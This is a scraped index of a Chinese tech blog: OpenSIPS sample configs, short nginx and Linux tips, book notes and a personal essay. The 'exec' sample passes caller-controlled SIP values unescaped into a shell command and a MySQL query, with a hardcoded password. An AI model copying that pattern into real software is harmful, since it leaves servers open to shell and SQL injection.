#loadmodule \u0026#34;auth.so\u0026#34; #loadmodule \u0026#34;auth_db.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- mi_fifo params -- modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) # -- usrloc params -- modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # Uncomment this if you want to use SQL database # for persistent storage and comment the previous line #modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 2) # -- auth params -- # Uncomment if you are using auth module # #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) # # If you set \u0026#34;calculate_ha1\u0026#34; parameter to yes (which is true in this config), # uncomment also the following parameter # #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # ------------------------- request routing logic ------------------- # main routing logic route{ setflag(1); t_on_failure(\u0026#34;1\u0026#34;); t_on_reply(\u0026#34;1\u0026#34;); log(1, \u0026#34;message received\\n\u0026#34;); t_relay(\u0026#34;udp:opensips.org:5060\u0026#34;); } onreply_route[1] { if (isflagset(1)) { log(1, \u0026#34;onreply: flag set\\n\u0026#34;); } else { log(1, \u0026#34;onreply: flag unset\\n\u0026#34;); }; } failure_route[1] { if (isflagset(1)) { log(1, \u0026#34;failure: flag set\\n\u0026#34;); } else { log(1, \u0026#34;failure: flag unset\\n\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/flag-reply/","summary":"# # simple quick-start config script # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) check_via=no\t# (cmd. line: -v) dns=no # (cmd. line: -r) rev_dns=no # (cmd.
line: -R) children=4 port=5060 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database #loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.","title":"flag_reply"},{"content":"# # $Id$ # # simple quick-start config script # # ----------- global configuration parameters ------------------------ #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;exec.so\u0026#34; # ----------------- setting module-specific parameters --------------- route{ # uri for my domain ? if (is_myself(\u0026#34;$rd\u0026#34;)) { if ($rm==\u0026#34;REGISTER\u0026#34;) { save(\u0026#34;location\u0026#34;); return; }; # native SIP destinations are handled using our USRLOC DB if (!lookup(\u0026#34;location\u0026#34;)) { # proceed to email notification if ($rm==\u0026#34;INVITE\u0026#34;) route(1) else sl_send_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; }; }; # user found, forward to his current uri now if (!t_relay()) { sl_reply_error(); }; } /* handling of missed calls */ route[1] { # don\u0026#39;t continue if it is a retransmission if ( !t_newtran()) { sl_reply_error(); exit; }; # external script: lookup user, if user exists, send # an email notification to him if (!exec_msg(\u0026#39; QUERY=\u0026#34;select email_address from subscriber where user=\\\u0026#34;$$SIP_OUSER\\\u0026#34;\u0026#34;; EMAIL=`mysql -Bsuser -pheslo -e \u0026#34;$$QUERY\u0026#34; ser`; if [ -z \u0026#34;$$EMAIL\u0026#34; ] ; then exit 1; fi ; echo \u0026#34;SIP request received from $$SIP_HF_FROM for $$SIP_OUSER\u0026#34; | mail 
-s \u0026#34;request for you\u0026#34; $$EMAIL \u0026#39;)) { # exec returned error ... user does not exist # send a stateful reply t_reply(\u0026#34;404\u0026#34;, \u0026#34;User does not exist\u0026#34;); } else { t_reply(\u0026#34;600\u0026#34;, \u0026#34;No messages for this user\u0026#34;); }; exit; } ","permalink":"https://wdd.js.org/opensips/ch8/exec/","summary":"# # $Id$ # # simple quick-start config script # # ----------- global configuration parameters ------------------------ #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;exec.so\u0026#34; # ----------------- setting module-specific parameters --------------- route{ # uri for my domain ? if (is_myself(\u0026#34;$rd\u0026#34;)) { if ($rm==\u0026#34;REGISTER\u0026#34;) { save(\u0026#34;location\u0026#34;); return; }; # native SIP destinations are handled using our USRLOC DB if (!lookup(\u0026#34;location\u0026#34;)) { # proceed to email notification if ($rm==\u0026#34;INVITE\u0026#34;) route(1) else sl_send_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; }; }; # user found, forward to his current uri now if (!","title":"exec"},{"content":"# # $Id$ # # example: accounting calls to numerical destinations # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- acc params -- # set the reporting log level modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_level\u0026#34;, 1) # number of flag, which will be used for accounting; if a
message is # labeled with this flag, its completion status will be reported modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1 ) # ------------------------- request routing logic ------------------- # main routing logic route{ /* ********* ROUTINE CHECKS ********************************** */ # filter too old messages if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { log(\u0026#34;LOG: Too many hops\\n\u0026#34;); sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # Process record-routing if (loose_route()) { # label BYEs for accounting if (is_method(\u0026#34;BYE\u0026#34;)) setflag(1); t_relay(); exit; }; # label all transactions for accounting setflag(1); # record-route INVITES to make sure BYEs will visit our server too if (is_method(\u0026#34;INVITE\u0026#34;)) record_route(); # forward the request statefully now; (we need *stateful* forwarding, # because the stateful mode correlates requests with replies and # drops retransmissions; otherwise, we would have to report on # every single message received) if (!t_relay()) { sl_reply_error(); exit; }; } ","permalink":"https://wdd.js.org/opensips/ch8/acc/","summary":"# # $Id$ # # example: accounting calls to numerical destinations # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- acc params -- # set the reporting log level modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_level\u0026#34;, 1) # number of flag, which will be used for accounting; if a message is # labeled with this flag, its
completion status will be reported modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1 ) # ------------------------- request routing logic ------------------- # main routing logic route{ /* ********* ROUTINE CHECKS ********************************** */ # filter too old messages if (!","title":"acc"},{"content":"# # Sample config for MySQL accounting with OpenSIPS # # - db_mysql module must be compiled and installed # # - new columns have to be added since by default only few are recorded # - here are full SQL statements to create acc and missed_calls tables # # CREATE TABLE `acc` ( # `id` int(10) unsigned NOT NULL auto_increment, # `method` varchar(16) NOT NULL default \u0026#39;\u0026#39;, # `from_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `to_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `callid` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `sip_code` char(3) NOT NULL default \u0026#39;\u0026#39;, # `sip_reason` varchar(32) NOT NULL default \u0026#39;\u0026#39;, # `time` datetime NOT NULL default \u0026#39;0000-00-00 00:00:00\u0026#39;, # `src_ip` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `src_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `src_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # INDEX acc_callid (`callid`), # PRIMARY KEY (`id`) # ); # # CREATE TABLE `missed_calls` ( # `id` int(10) unsigned NOT NULL auto_increment, # `method` varchar(16) NOT NULL default \u0026#39;\u0026#39;, # `from_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `to_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `callid` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `sip_code` char(3) NOT NULL default \u0026#39;\u0026#39;, # `sip_reason` varchar(32) NOT NULL default \u0026#39;\u0026#39;, # `time` datetime NOT NULL default
\u0026#39;0000-00-00 00:00:00\u0026#39;, # `src_ip` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `src_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `src_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # INDEX acc_callid (`callid`), # PRIMARY KEY (`id`) # ); # # # ----------- global configuration parameters ------------------------ log_level=3 # debug level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) /* Uncomment these lines to enter debugging mode */ #debug_mode=yes check_via=no\t# (cmd. line: -v) dns=no # (cmd. line: -r) rev_dns=no # (cmd. line: -R) port=5060 children=4 # # uncomment the following lines for TLS support #disable_tls = 0 #listen = tls:your_IP:5061 #tls_verify_server = 1 #tls_verify_client = 1 #tls_require_client_certificate = 0 #tls_method = TLSv1 #tls_certificate = \u0026#34;/usr/local/etc/opensips/tls/user/user-cert.pem\u0026#34; #tls_private_key = \u0026#34;/usr/local/etc/opensips/tls/user/user-privkey.pem\u0026#34; #tls_ca_list = \u0026#34;/usr/local/etc/opensips/tls/user/user-calist.pem\u0026#34; # ------------------ module loading ---------------------------------- # set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database # - MySQL loaded for accounting as well loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;mi_fifo.so\u0026#34; # Uncomment this if you want digest authentication # db_mysql.so must be loaded ! 
#loadmodule \u0026#34;auth.so\u0026#34; #loadmodule \u0026#34;auth_db.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- mi_fifo params -- modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) # -- usrloc params -- #modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # Uncomment this if you want to use SQL database # for persistent storage and comment the previous line modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 2) # -- auth params -- # Uncomment if you are using auth module # #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) # # If you set \u0026#34;calculate_ha1\u0026#34; parameter to yes (which true in this config), # uncomment also the following parameter) # #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # -- acc params -- modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) # flag to record to db modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_flag\u0026#34;, 1) modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_missed_flag\u0026#34;, 2) # flag to log to syslog modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1) modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_missed_flag\u0026#34;, 2) # use extra accounting to record caller and callee username/domain # - take them from From URI and R-URI modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_extra\u0026#34;, \u0026#34;src_user=$fU;src_domain=$fd;dst_user=$rU;dst_domain=$rd\u0026#34;) modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_extra\u0026#34;, \u0026#34;src_user=$fU;src_domain=$fd;dst_user=$rU;dst_domain=$rd\u0026#34;) # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if 
(!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; # subsequent messages withing a dialog should take the # path determined by record-routing if (loose_route()) { # mark routing logic in request append_hf(\u0026#34;P-hint: rr-enforced\\r\\n\u0026#34;); if(is_method(\u0026#34;BYE\u0026#34;)) { # account BYE for STOP record setflag(1); } route(1); }; # we record-route all messages -- to make sure that # subsequent messages will go through our proxy; that\u0026#39;s # particularly good if upstream and downstream entities # use different transport protocol if (!is_method(\u0026#34;REGISTER\u0026#34;)) record_route(); # account all calls if(is_method(\u0026#34;INVITE\u0026#34;)) { # set accounting on for INVITE (success or missed call) setflag(1); setflag(2); } if (!is_myself(\u0026#34;$rd\u0026#34;)) { # mark routing logic in request append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); # if you have some interdomain connections via TLS #if($ru=~\u0026#34;@tls_domain1.net\u0026#34;) { #\tt_relay(\u0026#34;tls:domain1.net\u0026#34;); #\texit; #} else if($ru=~\u0026#34;@tls_domain2.net\u0026#34;) { #\tt_relay(\u0026#34;tls:domain2.net\u0026#34;); #\texit; #} route(1); }; # if the request is for other domain use UsrLoc # (in case, it does not work, use the following command # with proper names and addresses in it) if (is_myself(\u0026#34;$rd\u0026#34;)) { if (is_method(\u0026#34;REGISTER\u0026#34;)) { # Uncomment this if you want to use digest authentication #if (!www_authorize(\u0026#34;opensips.org\u0026#34;, \u0026#34;subscriber\u0026#34;)) { #\twww_challenge(\u0026#34;opensips.org\u0026#34;, \u0026#34;0\u0026#34;); #\texit; #}; save(\u0026#34;location\u0026#34;); exit; }; if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound alias\\r\\n\u0026#34;); route(1); }; # native SIP destinations are handled using our USRLOC DB if 
(!lookup(\u0026#34;location\u0026#34;)) { sl_send_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; }; append_hf(\u0026#34;P-hint: usrloc applied\\r\\n\u0026#34;); }; route(1); } route[1] { # send it out now; use stateful forwarding as it works reliably # even for UDP2TCP if (!t_relay()) { sl_reply_error(); }; exit; } ","permalink":"https://wdd.js.org/opensips/ch8/acc-mysql/","summary":"# # Sample config for MySQL accouting with OpenSIPS # # - db_mysql module must be compiled and installed # # - new columns have to be added since by default only few are recorded # - here are full SQL statements to create acc and missed_calls tables # # CREATE TABLE `acc` ( # `id` int(10) unsigned NOT NULL auto_increment, # `method` varchar(16) NOT NULL default \u0026#39;\u0026#39;, # `from_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `to_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `callid` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `sip_code` char(3) NOT NULL default \u0026#39;\u0026#39;, # `sip_reason` varchar(32) NOT NULL default \u0026#39;\u0026#39;, # `time` datetime NOT NULL default \u0026#39;0000-00-00 00:00:00\u0026#39;, # `src_ip` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `src_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `src_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # INDEX acc_callid (`callid`), # PRIMARY KEY (`id`) # ); # # CREATE TABLE `missed_calls` ( # `id` int(10) unsigned NOT NULL auto_increment, # `method` varchar(16) NOT NULL default \u0026#39;\u0026#39;, # `from_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `to_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `callid` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `sip_code` char(3) NOT NULL default \u0026#39;\u0026#39;, # `sip_reason` varchar(32) NOT NULL 
default \u0026#39;\u0026#39;, # `time` datetime NOT NULL default \u0026#39;0000-00-00 00:00:00\u0026#39;, # `src_ip` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `src_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `src_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # INDEX acc_callid (`callid`), # PRIMARY KEY (`id`) # ); # # # ----------- global configuration parameters ------------------------ log_level=3 # debug level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) /* Uncomment these lines to enter debugging mode */ #debug_mode=yes check_via=no\t# (cmd.","title":"acc-mysql"},{"content":"script_trace是核心函数,不需要引入模块。\nscript_trace([log_level, pv_format_string[, info_string]]) This function start the script tracing - this helps to better understand the flow of execution in the OpenSIPS script, like what function is executed, what line it is, etc. Moreover, you can also trace the values of pseudo-variables, as script execution progresses. The blocks of the script where script tracing is enabled will print a line for each individual action that is done (e.g. assignments, conditional tests, module functions, core functions, etc.). Multiple pseudo-variables can be monitored by specifying a pv_format_string (e.g. \u0026#34;$ru---$avp(var1)\u0026#34;). The logs produced by multiple/different traced regions of your script can be differentiated (tagged) by specifying an additional plain string - info_string - as the 3rd parameter. To disable script tracing, just do script_trace(). Otherwise, the tracing will automatically stop at the end the end of the top route. 
Example of usage: script_trace( 1, \u0026#34;$rm from $si, ruri=$ru\u0026#34;, \u0026#34;me\u0026#34;); will produce: [line 578][me][module consume_credentials] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 581][me][core setsflag] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 583][me][assign equal] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 592][me][core if] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 585][me][module is_avp_set] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 589][me][core if] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 586][me][module is_method] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 587][me][module trace_dialog] -\u0026gt; (INVITE 127.0.0.1 , ruri=sip:tester@opensips.org) [line 590][me][core setflag] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) ","permalink":"https://wdd.js.org/opensips/ch7/cfg-trace/","summary":"script_trace是核心函数,不需要引入模块。\nscript_trace([log_level, pv_format_string[, info_string]]) This function start the script tracing - this helps to better understand the flow of execution in the OpenSIPS script, like what function is executed, what line it is, etc. Moreover, you can also trace the values of pseudo-variables, as script execution progresses. The blocks of the script where script tracing is enabled will print a line for each individual action that is done (e.g. assignments, conditional tests, module functions, core functions, etc.","title":"script_trace 打印opensips的脚本执行过程"},{"content":"之前读完鱼、美元和经济学的故事第一版,令我印象深刻。后来kindle上有出现了这本书的第二版,内容增加了,并且也增加了一些好看的插图。\n我度过不少经济学的书,《国富论》是比较深奥的一本,我只能看懂前面一两章,就读不下去了。\n但是小岛经济学的这本书,真的把经济学里难以理解的东西说的通俗易懂。\n也许经济学本来并不是那么难以理解,只是专家慢慢变多了,他们就把经济学变得难以理解了。因为只有这样,才能显得他们是多么的富有聪明才智。\n1. 自己的生意 每个人实际上都在经营自己的生意,将自己的劳动力卖给出价最高的老板。\n2. 
员工的价值 员工的价值主要取决于三个方面:\n需求(老板是否需要员工所掌握的技能) 供应(有多少人具备这些技能) 生产力(员工对那些工作完成的程度如何) 所以,你的价值并不会因为你吃苦耐劳而升高。\n3. 纽约地铁 纽约的地铁由私营公司建设,40年内都是由私营公司负责运营。虽然地铁造价不菲,但是还是实现了盈利。更值得一提的是,40年里车票的价格从未上涨。\n这是值得深思的地方,有些公共事情,私营公司来做可能要比政府做的更好、效率更高。\n政府对公共设施的垄断,很大的可能会造成效率低下和贪污腐败。\n4. 经济的目的 提供就业岗位并不是经济的目的,经济的目的是不断提高生产力。\n5. 膨胀与紧缩 通货膨胀就是货币的供给增加,相反的就是通货紧缩。价格并不会膨胀或者紧缩,价格只能上涨或者下跌。膨胀的不是价格,而是货币供给。\n6. 谁需要你的货币? 如果没有人想购买你的产品,也就没有人需要你的货币。\n美国的很多产品在全世界都很吃香,所以美元是很多国家都需要的。\n7. 人们为何消费? 经济并不会因为人们的消费而增长,而是经济增长会自然的带动人们的消费。\n但是目前看来,眼下最为火爆的就是“带货”这个词,各种人物,无论是公众明星还是普通人,都想来搞带货。\n各种新闻报道也在大肆宣扬,某某明星直播带货xxx亿元。\n当你被xxx亿元吸引时,你是否也曾暗暗思考过,这些钱来自哪里? 买这些东西对于消费者来说,又有什么好处。\n在经济因为疫情的影响而下行时,为什么会有那么多人疯狂购物呢?\n天下皆知美之为美,斯恶已。我想这种带货的模式,也许就快要到尽头了。\n8. 量化宽松 北京的白菜(一到)浙江,便用红头绳系住菜根,倒挂在水果店头,尊为“胶菜”;福建野生着的芦荟,(运往)北京就请进温室,且美其名曰“龙舌兰”. 《藤野先生》鲁迅\n明明白白的通货膨胀,到了经济学家和政客的嘴里,美其名曰“量化宽松”。\n","permalink":"https://wdd.js.org/posts/2020/05/kn7c4e/","summary":"之前读完鱼、美元和经济学的故事第一版,令我印象深刻。后来kindle上又出现了这本书的第二版,内容增加了,并且也增加了一些好看的插图。\n我读过不少经济学的书,《国富论》是比较深奥的一本,我只能看懂前面一两章,就读不下去了。\n但是小岛经济学的这本书,真的把经济学里难以理解的东西说的通俗易懂。\n也许经济学本来并不是那么难以理解,只是专家慢慢变多了,他们就把经济学变得难以理解了。因为只有这样,才能显得他们是多么的富有聪明才智。\n1. 自己的生意 每个人实际上都在经营自己的生意,将自己的劳动力卖给出价最高的老板。\n2. 员工的价值 员工的价值主要取决于三个方面:\n需求(老板是否需要员工所掌握的技能) 供应(有多少人具备这些技能) 生产力(员工对那些工作完成的程度如何) 所以,你的价值并不会因为你吃苦耐劳而升高。\n3. 纽约地铁 纽约的地铁由私营公司建设,40年内都是由私营公司负责运营。虽然地铁造价不菲,但是还是实现了盈利。更值得一提的是,40年里车票的价格从未上涨。\n这是值得深思的地方,有些公共事情,私营公司来做可能要比政府做的更好、效率更高。\n政府对公共设施的垄断,很大的可能会造成效率低下和贪污腐败。\n4. 经济的目的 提供就业岗位并不是经济的目的,经济的目的是不断提高生产力。\n5. 膨胀与紧缩 通货膨胀就是货币的供给增加,相反的就是通货紧缩。价格并不会膨胀或者紧缩,价格只能上涨或者下跌。膨胀的不是价格,而是货币供给。\n6. 谁需要你的货币? 如果没有人想购买你的产品,也就没有人需要你的货币。\n美国的很多产品在全世界都很吃香,所以美元是很多国家都需要的。\n7. 人们为何消费? 经济并不会因为人们的消费而增长,而是经济增长会自然的带动人们的消费。\n但是目前看来,眼下最为火爆的就是“带货”这个词,各种人物,无论是公众明星还是普通人,都想来搞带货。\n各种新闻报道也在大肆宣扬,某某明星直播带货xxx亿元。\n当你被xxx亿元吸引时,你是否也曾暗暗思考过,这些钱来自哪里? 买这些东西对于消费者来说,又有什么好处。\n在经济因为疫情的影响而下行时,为什么会有那么多人疯狂购物呢?\n天下皆知美之为美,斯恶已。我想这种带货的模式,也许就快要到尽头了。\n8. 量化宽松 北京的白菜(一到)浙江,便用红头绳系住菜根,倒挂在水果店头,尊为“胶菜”;福建野生着的芦荟,(运往)北京就请进温室,且美其名曰“龙舌兰”. 
《藤野先生》鲁迅\n明明白白的通货膨胀,到了经济学家和政客的嘴里,美其名曰“量化宽松”。","title":"小岛经济学: 鱼、美元和经济的故事"},{"content":"-.slice\n用 \u0026ndash; 表示参数已经结束\ncat \u0026ndash; -.slice\nvim \u0026ndash; -.slice\n","permalink":"https://wdd.js.org/posts/2020/05/ei2y93/","summary":"-.slice\n用 \u0026ndash; 表示参数已经结束\ncat \u0026ndash; -.slice\nvim \u0026ndash; -.slice","title":"文件名以-开头"},{"content":" 负载均衡只能均衡INVITE, 不能均衡REGISTER请求。因为load_balance底层是使用dialog模块去跟踪目标地址的负载情况。 load_balance方法会改变INVITE的$du, 而不会修改SIP URL 呼叫结束的时候,目标地址的负载会自动释放 选择逻辑 网关A 网关B 通道数 30 60 正在使用的通道数 20 55 空闲通道数 10 5 load_balance会先选择最大可用资源的目标地址。假如A网关的最大并发呼叫是30, B网关最大并发呼叫是60。在某个时刻,A网关上已经有20个呼叫了, B网关上已经有55个呼叫。 此时load_balance会优先选择网关A。\n参考 https://opensips.org/Documentation/Tutorials-LoadBalancing-1-9 ","permalink":"https://wdd.js.org/opensips/ch6/load-balance/","summary":" 负载均衡只能均衡INVITE, 不能均衡REGISTER请求。因为load_balance底层是使用dialog模块去跟踪目标地址的负载情况。 load_balance方法会改变INVITE的$du, 而不会修改SIP URL 呼叫结束的时候,目标地址的负载会自动释放 选择逻辑 网关A 网关B 通道数 30 60 正在使用的通道数 20 55 空闲通道数 10 5 load_balance会先选择最大可用资源的目标地址。假如A网关的最大并发呼叫是30, B网关最大并发呼叫是60。在某个时刻,A网关上已经有20个呼叫了, B网关上已经有55个呼叫。 此时load_balance会优先选择网关A。\n参考 https://opensips.org/Documentation/Tutorials-LoadBalancing-1-9 ","title":"负载均衡模块load_balance"},{"content":"-a -R -r /recording -S spool -P -a 所有的通话都录音 -R 不要把RTCP也写文件 -r 指定录音文件的位置 -S 临时文件的位置,注意不要和录音文件位置相同 -P 录成pcap文件的格式,而不要录成默认的 Ad-hoc的模式 ","permalink":"https://wdd.js.org/opensips/ch4/rtp-record/","summary":"-a -R -r /recording -S spool -P -a 所有的通话都录音 -R 不要把RTCP也写文件 -r 指定录音文件的位置 -S 临时文件的位置,注意不要和录音文件位置相同 -P 录成pcap文件的格式,而不要录成默认的 Ad-hoc的模式 ","title":"rtpproxy录音"},{"content":"隐藏版本号 nginx会在响应头上添加如下的头。\nServer: nginx/1.17.9 如果不想在Server部分显示出nginx的版本号,需要在nginx.conf的http{}部分设置\nhttp { server_tokens off; } 然后重启nginx, nginx的响应头就会变成。\nServer: nginx ","permalink":"https://wdd.js.org/posts/2020/05/es9hvu/","summary":"隐藏版本号 nginx会在响应头上添加如下的头。\nServer: nginx/1.17.9 如果不想在Server部分显示出nginx的版本号,需要在nginx.conf的http{}部分设置\nhttp { server_tokens off; } 然后重启nginx, nginx的响应头就会变成。\nServer: nginx ","title":"nginx 
配置不显示版本号"},{"content":"pwdx pid lsof -p pid | grep cwd ","permalink":"https://wdd.js.org/posts/2020/05/azkyhl/","summary":"pwdx pid lsof -p pid | grep cwd ","title":"获取进程工作目录"},{"content":" 人的大脑中有个器官,叫做下丘脑。下丘脑有控制体温的功能。刚出生的婴儿,下丘脑发育不完全,无法调节自己的体温。所以一般都把小宝宝包在被子里,而她只能通过哭闹反映自己的不适。\n随着身体的发育,下丘脑逐渐掌握体温控制的功能。\n白天越来越长,从电脑屏幕上抬起头,发现已经有人收拾桌面,准备好要下班了。\n不知不觉,已经六点多了。\n夕阳西下,晚霞似火,凉风习习。\n漕河泾的腾讯大楼,影子被拉到地下停车场的入口,彷佛是情人间的法式舌吻。\n园区里行人匆匆,车辆缓缓~\n掐指算起,毕业已四年。时间如白驹过隙,指间流沙。\n恍然间,三十将至,尚未而立。\n小孩子爱憎分明,喜欢与不喜欢就直接说,不懂得拐弯抹角。\n成年人放下爱憎,只有生存\n无论如何,你应当体谅别人的世界与你的不同。\n对你来说,很容易理解的问题。可能对别人来说,是难以理解的。\n不要将自己当作干柴,稍微一点,就成烈火。\n当你知道你将要说的话会让别人难堪时,请咽下去吧。\n不要轻易否定一个人的工作价值,每个人都希望自己得到肯定。\n无论是对待陌生人、同事、或者是朋友。\n我们不是刚出生的婴儿,我们有完全发育的下丘脑。\n控制你的体温,同时也控制你的脾气,你说话的方式。\n每个人都值得温柔以待,即使是你不喜欢的人。\n你好,下丘脑~\n","permalink":"https://wdd.js.org/posts/2020/05/nkegg6/","summary":"人的大脑中有个器官,叫做下丘脑。下丘脑有控制体温的功能。刚出生的婴儿,下丘脑发育不完全,无法调节自己的体温。所以一般都把小宝宝包在被子里,而她只能通过哭闹反映自己的不适。\n随着身体的发育,下丘脑逐渐掌握体温控制的功能。\n白天越来越长,从电脑屏幕上抬起头,发现已经有人收拾桌面,准备好要下班了。\n不知不觉,已经六点多了。\n夕阳西下,晚霞似火,凉风习习。\n漕河泾的腾讯大楼,影子被拉到地下停车场的入口,彷佛是情人间的法式舌吻。\n园区里行人匆匆,车辆缓缓~\n掐指算起,毕业已四年。时间如白驹过隙,指间流沙。\n恍然间,三十